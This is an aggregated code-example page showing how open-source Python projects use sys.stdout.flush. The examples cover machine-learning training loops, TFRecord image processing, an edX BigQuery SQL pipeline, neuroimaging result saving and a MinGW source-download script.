sys.stdout.flush

Here are the examples of the python api sys.stdout.flush taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

156 Examples 7

Example 1

Project: AI_Reader Source File: build_image_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               texts, labels, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    texts: list of strings; each string is human readable, e.g. 'dog'
    labels: list of integer; each integer identifies the ground truth
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      text = texts[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    text, height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()

Example 2

Project: edx2bigquery Source File: make_person_course_day.py
def process_course(course_id, force_recompute=False, use_dataset_latest=False, end_date=None, 
                   check_dates=True, skip_last_day=False):
    '''
    Make {course_id}.person_course_day table for specified course_id.

    This is a single course-specific table, which contains all day's data.
    It is incrementally updated when new tracking logs data comes in,
    by appending rows to the end.  The rows are kept in time order.

    check_dates is disregarded.

    If skip_last_day is True then do not include the last day of tracking log data
    in the processing.  This is done to avoid processing partial data, e.g. when
    tracking log data are incrementally loaded with a delta of less than one day.
    '''

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)

    videoTableExists = False
    try:

        tinfo_video = bqutil.get_bq_table_info(dataset, 'video_stats_day')
        assert tinfo_video is not None, "Video stats table missing... Not including video stats"
	videoTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
	pass
        #return

    forumTableExists = False
    try:

        tinfo_forum = bqutil.get_bq_table_info(dataset, 'forum_events')
        assert tinfo_forum is not None, "Forum events table missing... Not including forum stats"
	forumTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
	pass
        #return

    problemTableExists = False
    try:

        tinfo_personproblem = bqutil.get_bq_table_info(dataset, 'person_problem')
        tinfo_courseproblem = bqutil.get_bq_table_info(dataset, 'course_problem')
        tinfo_courseaxis = bqutil.get_bq_table_info(dataset, 'course_axis')
        tinfo_personcourse = bqutil.get_bq_table_info(dataset, 'person_course')
	# Check course axis and person course, course problem
        assert tinfo_personproblem is not None, "Person problem table missing... Not including problem stats"
        assert tinfo_courseproblem is not None, "Course problem table missing... Not including problem stats"
        assert tinfo_courseaxis is not None, "Course axis table missing... Not including problem stats"
        assert tinfo_personcourse is not None, "Person Course table missing... Not including problem stats"
	problemTableExists = True

    except (AssertionError, Exception) as err:
        #print " --> Err: missing %s.%s?  Skipping creation of chapter_grades" % (dataset, "course_axis")
        sys.stdout.flush()
	pass

    PCDAY_SQL_BASE_SELECT = """
			  SELECT username,
				 '{course_id}' AS course_id,
				 DATE(time) AS date,
				 SUM(bevent) AS nevents,
				 SUM(bprogress) AS nprogcheck,
				 SUM(bshow_answer) AS nshow_answer,
				 SUM(bvideo) AS nvideo,
				 SUM(bproblem_check) AS nproblem_check,
				 SUM(bforum) AS nforum,
				 SUM(bshow_transcript) AS ntranscript,
				 SUM(bseq_goto) AS nseq_goto,
				 SUM(bseek_video) AS nseek_video,
				 SUM(bpause_video) AS npause_video,
		    """

    PCDAY_SQL_VIDEO_EXISTS = """
			  	 COUNT(DISTINCT video_id) AS nvideos_viewed, # New Video - Unique videos viewed
				 SUM(case when position is not null then FLOAT(position) else FLOAT(0.0) end) AS nvideos_watched_sec, # New Video - # sec watched using max video position
		    """

    PCDAY_SQL_VIDEO_DNE = """
				 0 AS nvideos_viewed, # New Video - Unique videos viewed
				 FLOAT(0.0) AS nvideos_watched_sec, # New Video - # sec watched using max video position
		    """
    PCDAY_SQL_VIDEO_SELECT = PCDAY_SQL_VIDEO_EXISTS if videoTableExists else PCDAY_SQL_VIDEO_DNE

    PCDAY_SQL_FORUM_EXISTS = """
				 SUM(case when read is not null then read else 0 end) AS nforum_reads, # New discussion - Forum reads
				 SUM(case when write is not null then write else 0 end) AS nforum_posts, # New discussion - Forum posts
				 COUNT(DISTINCT thread_id ) AS nforum_threads, # New discussion - Unique forum threads interacted with
		    """

    PCDAY_SQL_FORUM_DNE = """
				 0 AS nforum_reads, # New discussion - Forum reads
				 0 AS nforum_posts, # New discussion - Forum posts
				 0 AS nforum_threads, # New discussion - Unique forum threads interacted with
		    """
    PCDAY_SQL_FORUM_SELECT = PCDAY_SQL_FORUM_EXISTS if forumTableExists else PCDAY_SQL_FORUM_DNE

    PCDAY_SQL_PROBLEM_EXISTS = """
				 COUNT(DISTINCT problem_nid ) AS nproblems_answered, # New Problem - Unique problems attempted
				 SUM(case when n_attempts is not null then n_attempts else 0 end) AS nproblems_attempted, # New Problem - Total attempts
				 SUM(case when ncount_problem_multiplechoice is not null then ncount_problem_multiplechoice else 0 end) as nproblems_multiplechoice,
				 SUM(case when ncount_problem_choice is not null then ncount_problem_choice else 0 end) as nproblems_choice,
				 SUM(case when ncount_problem_numerical is not null then ncount_problem_numerical else 0 end) as nproblems_numerical,
				 SUM(case when ncount_problem_option is not null then ncount_problem_option else 0 end) as nproblems_option,
				 SUM(case when ncount_problem_custom is not null then ncount_problem_custom else 0 end) as nproblems_custom,
				 SUM(case when ncount_problem_string is not null then ncount_problem_string else 0 end) as nproblems_string,
				 SUM(case when ncount_problem_mixed is not null then ncount_problem_mixed else 0 end) as nproblems_mixed,
				 SUM(case when ncount_problem_formula is not null then ncount_problem_formula else 0 end) as nproblems_forumula,
				 SUM(case when ncount_problem_other is not null then ncount_problem_other else 0 end) as nproblems_other,
		    """

    PCDAY_SQL_PROBLEM_DNE = """
				 0 AS nproblems_answered, # New Problem - Unique problems attempted
				 0 AS nproblems_attempted, # New Problem - Total attempts
				 0 AS nproblems_multiplechoice,
				 0 AS nproblems_choice,
				 0 AS nproblems_numerical,
				 0 AS nproblems_option,
				 0 AS nproblems_custom,
				 0 AS nproblems_string,
				 0 AS nproblems_mixed,
				 0 AS nproblems_forumula,
				 0 AS nproblems_other,
		    """
    PCDAY_SQL_PROBLEM_SELECT = PCDAY_SQL_PROBLEM_EXISTS if problemTableExists else PCDAY_SQL_PROBLEM_DNE

    PCDAY_SQL_MID = """
				 MAX(time) AS last_event,
				 AVG( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS avg_dt,
				 STDDEV( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS sdv_dt,
				 MAX( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS max_dt,
				 COUNT( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS n_dt,
				 SUM( CASE WHEN (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 > 5*60 THEN NULL ELSE (TIMESTAMP_TO_USEC(time) - last_time)/1.0E6 END ) AS sum_dt
			FROM (
			  SELECT
			    *
			  FROM (
			    SELECT
			      username,
			      CASE WHEN event_type = "play_video" THEN 1 ELSE 0 END AS bvideo,
			      CASE WHEN event_type = "problem_check" THEN 1 ELSE 0 END AS bproblem_check,
			      CASE WHEN username != "" THEN 1 ELSE 0 END AS bevent,
			      CASE WHEN REGEXP_MATCH(event_type, "^/courses/{course_id}/discussion/.*") then 1 else 0 end as bforum,
			      CASE WHEN REGEXP_MATCH(event_type, "^/courses/{course_id}/progress") then 1 else 0 end as bprogress,
			      CASE WHEN event_type IN ("show_answer",
				"showanswer") THEN 1 ELSE 0 END AS bshow_answer,
			      CASE WHEN event_type = 'show_transcript' THEN 1 ELSE 0 END AS bshow_transcript,
			      CASE WHEN event_type = 'seq_goto' THEN 1 ELSE 0 END AS bseq_goto,
			      CASE WHEN event_type = 'seek_video' THEN 1 ELSE 0 END AS bseek_video,
			      CASE WHEN event_type = 'pause_video' THEN 1 ELSE 0 END AS bpause_video,
			      # case when event_type = 'edx.course.enrollment.activated' then 1 else 0 end as benroll,
			      # case when event_type = 'edx.course.enrollment.deactivated' then 1 else 0 end as bunenroll
			      time,
			      LAG(time, 1) OVER (PARTITION BY username ORDER BY time) last_time
			    FROM {DATASETS}
			    WHERE
			      NOT event_type CONTAINS "/xblock/"
			      AND username != "" )
		    """


    PCDAY_SQL_VIDEO = """ ,
			  ( # Video events
				  SELECT TIMESTAMP(date) as time,
				         '{course_id}' as course_id,
				         username,
				         video_id,
				         position,
				  FROM [{dataset}.video_stats_day]
				  WHERE TIMESTAMP(date)>= TIMESTAMP("{min_date_start}") and TIMESTAMP(date) <= TIMESTAMP("{max_date_end}")

			  )
                      """
    PCDAY_SQL_ADD = PCDAY_SQL_VIDEO if videoTableExists else ''

    PCDAY_SQL_FORUM = """ ,
			  ( # Forum Events
				   SELECT time,
					  username,
				          '{course_id}' as course_id,
				          thread_id,
				          (CASE WHEN (forum_action == "reply" or forum_action == "comment_reply"
						      or forum_action == "created_thread" or forum_action == "created_response" or forum_action == "created_comment")
						THEN 1 ELSE 0 END) AS write,
					  (CASE WHEN (forum_action == "read" or forum_action == "read_inline") THEN 1 ELSE 0 END) AS read,
				   FROM [{dataset}.forum_events]
				   WHERE (forum_action == "reply" or forum_action == "comment_reply"
					  or forum_action == "created_thread" or forum_action == "created_response" or forum_action == "created_comment"
					  or forum_action == "read" or forum_action == "read_inline")
				          and ( time >= TIMESTAMP("{min_date_start}") and time <= TIMESTAMP("{max_date_end}") )
			  )
                      """
    PCDAY_SQL_ADD = PCDAY_SQL_ADD + PCDAY_SQL_FORUM if forumTableExists else PCDAY_SQL_ADD

    PCDAY_SQL_PROBLEM = """,
			  ( # Problems
				   SELECT pc.username AS username,
				          pp.problem_nid AS problem_nid,
				          pp.n_attempts AS n_attempts,
				          pp.time AS time,
				          '{course_id}' as course_id,
					  pp.ncount_problem_multiplechoice as ncount_problem_multiplechoice,
					  pp.ncount_problem_choice as ncount_problem_choice,
					  pp.ncount_problem_numerical as ncount_problem_numerical,
					  pp.ncount_problem_option as ncount_problem_option,
					  pp.ncount_problem_custom as ncount_problem_custom,
					  pp.ncount_problem_string as ncount_problem_string,
					  pp.ncount_problem_mixed as ncount_problem_mixed,
					  pp.ncount_problem_formula as ncount_problem_formula,
					  pp.ncount_problem_other as ncount_problem_other,
				   FROM (

					   (
					      SELECT PP.user_id as user_id,
						     PP.problem_nid AS problem_nid,
						     PP.n_attempts as n_attempts,
						     PP.date as time,
						     (Case when CP_CA.data_itype == "multiplechoiceresponse" then 1 else 0 end) as ncount_problem_multiplechoice, # Choice
					             (Case when CP_CA.data_itype == "choiceresponse" then 1 else 0 end) as ncount_problem_choice,       # Choice
						     (Case when CP_CA.data_itype == "numericalresponse" then 1 else 0 end) as ncount_problem_numerical, #input
						     (Case when CP_CA.data_itype == "optionresponse" then 1 else 0 end) as ncount_problem_option,       # Choice
					             (Case when CP_CA.data_itype == "customresponse" then 1 else 0 end) as ncount_problem_custom,       # Custom
					             (Case when CP_CA.data_itype == "stringresponse" then 1 else 0 end) as ncount_problem_string,       # Input
					             (Case when CP_CA.data_itype == "mixed" then 1 else 0 end) as ncount_problem_mixed,                 # Mixed
					             (Case when CP_CA.data_itype == "forumula" then 1 else 0 end) as ncount_problem_formula,            # Input
					             (Case when CP_CA.data_itype != "multiplechoiceresponse" and
							        CP_CA.data_itype != "choiceresponse" and
							        CP_CA.data_itype != "numericalresponse" and
							        CP_CA.data_itype != "optionresponse" and
							        CP_CA.data_itype != "customresponse" and
							        CP_CA.data_itype != "stringresponse" and
							        CP_CA.data_itype != "mixed" and
							        CP_CA.data_itype != "forumula"
							   then 1 else 0 end) as ncount_problem_other, # Input
						     #MAX(n_attempts) AS n_attempts,
						     #MAX(date) AS time,
					      FROM [{dataset}.person_problem] PP
					      LEFT JOIN
					      (
							SELECT CP.problem_nid as problem_nid,
							       INTEGER(CP.problem_id) as problem_id,
							       CA.data.itype as data_itype,
						        FROM [{dataset}.course_problem] CP
						        LEFT JOIN [{dataset}.course_axis] CA
						        ON CP.problem_id == CA.url_name
					      ) as CP_CA
					      ON PP.problem_nid == CP_CA.problem_nid
					      GROUP BY time, user_id, problem_nid, n_attempts,
						       ncount_problem_multiplechoice,
						       ncount_problem_choice,
						       ncount_problem_choice,
						       ncount_problem_numerical,
						       ncount_problem_option,
						       ncount_problem_custom,
						       ncount_problem_string,
						       ncount_problem_mixed,
						       ncount_problem_formula,
						       ncount_problem_other
					      )

					      #FROM [{dataset}.person_item] PI
					      #JOIN [{dataset}.course_item] CI
					      #ON PI.item_nid = CI.item_nid
					      #GROUP BY user_id,
						       #problem_nid
					      #ORDER BY
						       #user_id,
						       #problem_nid
					) AS pp
				        LEFT JOIN (
							      SELECT username,
								     user_id
							      FROM [{dataset}.person_course] 
					) AS pc
					ON pc.user_id = pp.user_id
				        WHERE time >= TIMESTAMP("{min_date_start}") and time <= TIMESTAMP("{max_date_end}")
			  )
 
                        """
    PCDAY_SQL_ADD = PCDAY_SQL_ADD + PCDAY_SQL_PROBLEM if problemTableExists else PCDAY_SQL_ADD

    PCDAY_SQL_END = """
			  )
			  WHERE time > TIMESTAMP("{last_date}")
			  GROUP BY course_id,
				   username,
				   date
			  ORDER BY date
		    """


    PCDAY_SQL_NEW = PCDAY_SQL_BASE_SELECT + PCDAY_SQL_VIDEO_SELECT + PCDAY_SQL_FORUM_SELECT + PCDAY_SQL_PROBLEM_SELECT + PCDAY_SQL_MID + PCDAY_SQL_ADD + PCDAY_SQL_END

    PCDAY_SQL = PCDAY_SQL_NEW.format( dataset=dataset, course_id="{course_id}", DATASETS="{DATASETS}", last_date="{last_date}", min_date_start="{min_date_start}", max_date_end="{max_date_end}")

    table = 'person_course_day'

    def gdf(row):
        return datetime.datetime.strptime(row['date'], '%Y-%m-%d')

    print "=== Processing person_course_day for %s (start %s)"  % (course_id, datetime.datetime.now())
    sys.stdout.flush()

    # Major person_course_day schema revision 19-Jan-2016 adds new fields; if table exists, ensure it 
    # has new schema, else force recompute.
    try:
        tinfo = bqutil.get_bq_table_info(dataset, table)
    except Exception as err:
        tinfo = None
    if tinfo:
        fields = tinfo['schema']['fields']
        field_names = [x['name'] for x in fields]
        if not 'nvideos_viewed' in field_names:
            cdt = tinfo['creationTime']
            print "    --> person_course_day created %s; missing nvideos_viewed field in schema; forcing recompute - this may take a long time!" % cdt
            sys.stdout.flush()
            force_recompute = True

    process_tracking_logs.run_query_on_tracking_logs(PCDAY_SQL, table, course_id, force_recompute=force_recompute,
                                                     use_dataset_latest=use_dataset_latest,
                                                     end_date=end_date,
                                                     get_date_function=gdf,
                                                     newer_than=datetime.datetime( 2016, 1, 19, 22, 30 ),
                                                     skip_last_day=skip_last_day)
    
    print "Done with person_course_day for %s (end %s)"  % (course_id, datetime.datetime.now())
    print "="*77
    sys.stdout.flush()

Example 3

Project: theano-hf Source File: hf.py
  def train(self, gradient_dataset, cg_dataset, initial_lambda=0.1, mu=0.03, global_backtracking=False, preconditioner=False, max_cg_iterations=250, num_updates=100, validation=None, validation_frequency=1, patience=numpy.inf, save_progress=None):
    '''Performs HF training.

  gradient_dataset : SequenceDataset-like object
      Defines batches used to compute the gradient.
      The `iterate(update=True)` method should yield shuffled training examples
      (tuples of variables matching your graph inputs).
      The same examples MUST be returned between multiple calls to iterator(),
      unless update is True, in which case the next batch should be different.
  cg_dataset : SequenceDataset-like object
      Defines batches used to compute CG iterations.
  initial_lambda : float
      Initial value of the Tikhonov damping coefficient.
  mu : float
      Coefficient for structural damping.
  global_backtracking : Boolean
      If True, backtracks as much as necessary to find the global minimum among
      all CG iterates. Else, Martens' heuristic is used.
  preconditioner : Boolean
      Whether to use Martens' preconditioner.
  max_cg_iterations : int
      CG stops after this many iterations regardless of the stopping criterion.
  num_updates : int
      Training stops after this many parameter updates regardless of `patience`.
  validation: SequenceDataset object, (lambda : tuple) callback, or None
      If a SequenceDataset object is provided, the training monitoring costs
      will be evaluated on that validation dataset.
      If a callback is provided, it should return a list of validation costs
      for monitoring, the first of which is also used for early stopping.
      If None, no early stopping nor validation monitoring is performed.
  validation_frequency: int
      Validation is performed every `validation_frequency` updates.
  patience: int
      Training stops after `patience` updates without improvement in validation
      cost.
  save_progress: string or None
      A checkpoint is automatically saved at this location after each update.
      Call the `train` function again with the same parameters to resume
      training.'''

    self.lambda_ = initial_lambda
    self.mu = mu
    self.global_backtracking = global_backtracking
    self.cg_dataset = cg_dataset
    self.preconditioner = preconditioner
    self.max_cg_iterations = max_cg_iterations
    best = [0, numpy.inf, None]  # iteration, cost, params
    first_iteration = 1

    if isinstance(save_progress, str) and os.path.isfile(save_progress):
      save = cPickle.load(file(save_progress))
      self.cg_last_x, best, self.lambda_, first_iteration, init_p = save
      first_iteration += 1
      for i, j in zip(self.p, init_p): i.set_value(j)
      print '* recovered saved model'
    
    try:
      for u in xrange(first_iteration, 1 + num_updates):
        print 'update %i/%i,' % (u, num_updates),
        sys.stdout.flush()

        gradient = numpy.zeros(sum(self.sizes), dtype=theano.config.floatX)
        costs = []
        for inputs in gradient_dataset.iterate(update=True):
          result = self.f_gc(*inputs)
          gradient += self.list_to_flat(result[:len(self.p)]) / gradient_dataset.number_batches
          costs.append(result[len(self.p):])

        print 'cost=', numpy.mean(costs, axis=0),
        print 'lambda=%.5f,' % self.lambda_,
        sys.stdout.flush()

        after_cost, flat_delta, backtracking, num_cg_iterations = self.cg(-gradient)
        delta_cost = numpy.dot(flat_delta, gradient + 0.5*self.batch_Gv(flat_delta, lambda_=0))  # disable damping
        before_cost = self.quick_cost()
        for i, delta in zip(self.p, self.flat_to_list(flat_delta)):
          i.set_value(i.get_value() + delta)
        cg_dataset.update()

        rho = (after_cost - before_cost) / delta_cost  # Levenberg-Marquardt
        #print 'rho=%f' %rho,
        if rho < 0.25:
          self.lambda_ *= 1.5
        elif rho > 0.75:
          self.lambda_ /= 1.5
        
        if validation is not None and u % validation_frequency == 0:
          if hasattr(validation, 'iterate'):
            costs = numpy.mean([self.f_cost(*i) for i in validation.iterate()], axis=0)
          elif callable(validation):
            costs = validation()
          print 'validation=', costs,
          if costs[0] < best[1]:
            best = u, costs[0], [i.get_value().copy() for i in self.p]
            print '*NEW BEST',

        if isinstance(save_progress, str):
          # do not save dataset states
          save = self.cg_last_x, best, self.lambda_, u, [i.get_value().copy() for i in self.p]
          cPickle.dump(save, file(save_progress, 'wb'), cPickle.HIGHEST_PROTOCOL)
        
        if u - best[0] > patience:
          print 'PATIENCE ELAPSED, BAILING OUT'
          break
        
        print
        sys.stdout.flush()
    except KeyboardInterrupt:
      print 'Interrupted by user.'
    
    if best[2] is None:
      best[2] = [i.get_value().copy() for i in self.p]
    return best[2]

Example 4

Project: prettytensor Source File: local_trainer.py
  def run_model(self,
                op_list,
                num_steps,
                feed_vars=(),
                feed_data=None,
                print_every=100,
                allow_initialize=True):
    """Runs `op_list` for `num_steps`.

    Args:
      op_list: A list of ops to run.
      num_steps: Number of steps to run this for.  If feeds are used, this is a
        maximum.
      feed_vars: The variables to feed.
      feed_data: An iterator that feeds data tuples.
      print_every: Print a log line and checkpoing every so many steps.
      allow_initialize: If True, the model will be initialized if any variable
        is uninitialized, if False the model will not be initialized.
    Returns:
      The final run result as a list.
    Raises:
      ValueError: If feed_data doesn't match feed_vars.
    """
    feed_data = feed_data or itertools.repeat(())

    ops = [bookkeeper.global_step()]
    ops.extend(op_list)

    sess = tf.get_default_session()
    self.prepare_model(sess, allow_initialize=allow_initialize)
    results = []
    try:
      for i, data in zip(xrange(num_steps), feed_data):
        log_this_time = print_every and i % print_every == 0
        if len(data) != len(feed_vars):
          raise ValueError(
              'feed_data and feed_vars must be the same length: %d vs %d' % (
                  len(data), len(feed_vars)))
        if self._coord.should_stop():
          print('Coordinator stopped')
          sys.stdout.flush()
          self.stop_queues()
          break
        if len(feed_vars) != len(data):
          raise ValueError('Feed vars must be the same length as data.')

        if log_this_time and self._summary_writer:
          results = sess.run(ops + [self._summaries],
                             dict(zip(feed_vars, data)))
          self._summary_writer.add_summary(results[-1], results[0])
          results = results[:-1]
        else:
          results = sess.run(ops, dict(zip(feed_vars, data)))
        if log_this_time:
          self._log_and_save(sess, results)

      # Print the last line if it wasn't just printed
      if print_every and not log_this_time:
        self._log_and_save(sess, results)
    except tf.errors.OutOfRangeError as ex:
      print('Done training -- epoch limit reached %s' % ex)
      sys.stdout.flush()
      self.stop_queues()
    except BaseException as ex:
      print('Exception -- stopping threads: %s' % ex, file=sys.stderr)
      sys.stdout.flush()
      self.stop_queues()
      raise
    return results

Example 5

Project: COMMIT Source File: core.py
    def save_results( self, path_suffix = None ) :
        """Save the output (coefficients, errors, maps etc).

        Parameters
        ----------
        path_suffix : string
            Text to be appended to "Results" to create the output path (default : None)
        """
        if self.x is None :
            raise RuntimeError( 'Model not fitted to the data; call "fit()" first.' )

        RESULTS_path = 'Results_' + self.model.id
        if path_suffix :
            self.set_config('path_suffix', path_suffix)
            RESULTS_path = RESULTS_path +'_'+ path_suffix

        print '\n-> Saving results to "%s/*":' % RESULTS_path
        tic = time.time()

        # create folder or delete existing files (if any)
        RESULTS_path = pjoin( self.get_config('TRACKING_path'), RESULTS_path )
        if not exists( RESULTS_path ) :
            makedirs( RESULTS_path )
        else :
            for f in glob.glob( pjoin(RESULTS_path,'*') ) :
                remove( f )
        self.set_config('RESULTS_path', RESULTS_path)

        # Configuration and results
        print '\t* configuration and results...',
        sys.stdout.flush()
        nF = self.DICTIONARY['IC']['nF']
        nE = self.DICTIONARY['EC']['nE']
        nV = self.DICTIONARY['nV']
        # x is the x of the original problem
        # self.x is the x preconditioned
        # x_map is the x used to generate the intra-cellular, extra-cellular and isotropic maps (not divided by norm of the fiber)
        if self.get_config('doNormalizeKernels') :
            # renormalize the coefficients
            norm1 = np.repeat(self.KERNELS['wmr_norm'],nF)
            norm2 = np.repeat(self.KERNELS['wmh_norm'],nE)
            norm3 = np.repeat(self.KERNELS['iso_norm'],nV)
            norm_fib = np.kron(np.ones(self.KERNELS['wmr'].shape[0]), self.DICTIONARY['TRK']['norm'])
            x_map = self.x / np.hstack( (norm1,norm2,norm3) )
            x = self.x / np.hstack( (norm1*norm_fib,norm2,norm3) )
        else :
            x_map = self.x
            x = self.x
        with open( pjoin(RESULTS_path,'results.pickle'), 'wb+' ) as fid :
            cPickle.dump( [self.CONFIG, self.x, x], fid, protocol=2 )
        print '[ OK ]'

        # Map of wovelwise errors
        print '\t* fitting errors:'

        niiMAP_img = np.zeros( self.get_config('dim'), dtype=np.float32 )
        affine = self.niiDWI.affine if nibabel.__version__ >= '2.0.0' else self.niiDWI.get_affine()
        niiMAP     = nibabel.Nifti1Image( niiMAP_img, affine )
        niiMAP_hdr = niiMAP.header if nibabel.__version__ >= '2.0.0' else niiMAP.get_header()

        y_mea = np.reshape( self.niiDWI_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'], : ].flatten().astype(np.float32), (nV,-1) )
        y_est = np.reshape( self.A.dot(self.x), (nV,-1) ).astype(np.float32)

        print '\t\t- RMSE...',
        sys.stdout.flush()
        tmp = np.sqrt( np.mean((y_mea-y_est)**2,axis=1) )
        niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = tmp
        niiMAP_hdr['cal_min'] = 0
        niiMAP_hdr['cal_max'] = tmp.max()
        nibabel.save( niiMAP, pjoin(RESULTS_path,'fit_RMSE.nii.gz') )
        print ' [ %.3f +/- %.3f ]' % ( tmp.mean(), tmp.std() )

        print '\t\t- NRMSE...',
        sys.stdout.flush()
        tmp = np.sum(y_mea**2,axis=1)
        idx = np.where( tmp < 1E-12 )
        tmp[ idx ] = 1
        tmp = np.sqrt( np.sum((y_mea-y_est)**2,axis=1) / tmp )
        tmp[ idx ] = 0
        niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = tmp
        niiMAP_hdr['cal_min'] = 0
        niiMAP_hdr['cal_max'] = 1
        nibabel.save( niiMAP, pjoin(RESULTS_path,'fit_NRMSE.nii.gz') )
        print '[ %.3f +/- %.3f ]' % ( tmp.mean(), tmp.std() )

        # Map of compartment contributions
        print '\t* voxelwise contributions:'

        print '\t\t- intra-axonal',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['wmr']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0]
            tmp = x_map[:offset].reshape( (-1,nF) ).sum( axis=0 )
            xv = np.bincount( self.DICTIONARY['IC']['v'], minlength=nV,
                weights=tmp[ self.DICTIONARY['IC']['fiber'] ] * self.DICTIONARY['IC']['len']
            ).astype(np.float32)
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_IC.nii.gz') )
        print '[ OK ]'

        print '\t\t- extra-axonal',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['wmh']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0]
            tmp = x_map[offset:offset+nE*len(self.KERNELS['wmh'])].reshape( (-1,nE) ).sum( axis=0 )
            xv = np.bincount( self.DICTIONARY['EC']['v'], weights=tmp, minlength=nV ).astype(np.float32)
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_EC.nii.gz') )
        print '[ OK ]'

        print '\t\t- isotropic',
        sys.stdout.flush()
        niiMAP_img[:] = 0
        if len(self.KERNELS['iso']) > 0 :
            offset = nF * self.KERNELS['wmr'].shape[0] + nE * self.KERNELS['wmh'].shape[0]
            xv = x_map[offset:].reshape( (-1,nV) ).sum( axis=0 )
            niiMAP_img[ self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] ] = xv
        nibabel.save( niiMAP, pjoin(RESULTS_path,'compartment_ISO.nii.gz') )
        print '   [ OK ]'

        print '   [ %.1f seconds ]' % ( time.time() - tic )

Example 6

Project: buildtools-BaseTools Source File: mingw-gcc-build.py
Function: get_all
    def GetAll(self):

        def progress(received, blockSize, fileSize):
            if fileSize < 0: return
            wDots = (100 * received * blockSize) / fileSize / 10
            if wDots > self.dots:
                for i in range(wDots - self.dots):
                    print '.',
                    sys.stdout.flush()
                    self.dots += 1

        maxRetries = 1
        for (fname, fdata) in self.source_files.items():
            for retries in range(maxRetries):
                try:
                    self.dots = 0
                    local_file = os.path.join(self.config.src_dir, fdata['filename'])
                    url = fdata['url']
                    print 'Downloading %s:' % fname, url
                    if retries > 0:
                        print '(retry)',
                    sys.stdout.flush()

                    completed = False
                    if os.path.exists(local_file):
                        md5_pass = self.checkHash(fdata)
                        if md5_pass:
                            print '[md5 match]',
                        else:
                            print '[md5 mismatch]',
                        sys.stdout.flush()
                        completed = md5_pass

                    if not completed:
                        urllib.urlretrieve(url, local_file, progress)

                    #
                    # BUGBUG: Suggest proxy to user if download fails.
                    #
                    # export http_proxy=http://proxyservername.mycompany.com:911
                    # export ftp_proxy=http://proxyservername.mycompany.com:911

                    if not completed and os.path.exists(local_file):
                        md5_pass = self.checkHash(fdata)
                        if md5_pass:
                            print '[md5 match]',
                        else:
                            print '[md5 mismatch]',
                        sys.stdout.flush()
                        completed = md5_pass

                    if completed:
                        print '[done]'
                        break
                    else:
                        print '[failed]'
                        print '  Tried to retrieve', url
                        print '  to', local_file
                        print 'Possible fixes:'
                        print '* If you are behind a web-proxy, try setting the',
                        print 'http_proxy environment variable'
